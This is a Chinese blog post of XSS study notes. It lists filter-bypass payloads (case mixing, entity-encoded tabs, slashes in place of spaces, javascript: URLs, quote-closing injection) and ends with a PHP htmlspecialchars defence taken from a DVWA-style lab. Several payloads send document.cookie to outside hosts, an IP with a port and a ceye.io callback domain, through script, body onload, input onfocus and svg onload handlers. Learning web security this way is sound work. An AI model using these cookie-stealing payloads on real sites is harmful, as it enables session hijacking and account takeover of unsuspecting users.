XSS漏洞

1.过滤 script 可以大小写绕过:scRipt

2.换别的方式

<script>window.open('http://118.31.168.198:39543/'+document.cookie)</script>
<body onload="window.open('http://118.31.168.198:39543/'+document.cookie)">
<input onfocus="window.open('http://1q3gva.ceye.io/'+document.cookie)" autofocus>
<svg onload="window.open('http://118.31.168.198:39543/'+document.cookie)">
<iframe src=javascript:alert(1)>
<a href=javascript:alert(1)>link</a>
<img src=x onerror=alert(1)></img>

(2)关键字可以用 内嵌tab的html实体编码绕过

<iframe src=java&#x09;script:alert(1)>

 

过滤了空格:

<body/onload="window.open('http://118.31.168.198:39543/'+document.cookie)">

(2) 网页中空格可以用 &nbsp;代替 也可以用实体编码 &#x20;代替

3. html实体编码 在brupsuite中编码

可以把实体编码的16进制变为十进制


N1book:

1.关于链接和跳转进行XSS的。因此可以利用js伪协议实现alert:

?jumpUrl=javascript:alert(1)

2.闭合注释绕过

源代码中语句为 var username='111',可以闭合绕过

';alert(1);//

绝对防御:

  • htmlspecialchars(string): 把预定义的字符: “<” (小于)、 “>” (大于)、& 、‘’、“” 转换为HTML实体,防止浏览器将其作为HTML元素。
<?php

// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    echo "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();

?> 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

El.十一

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值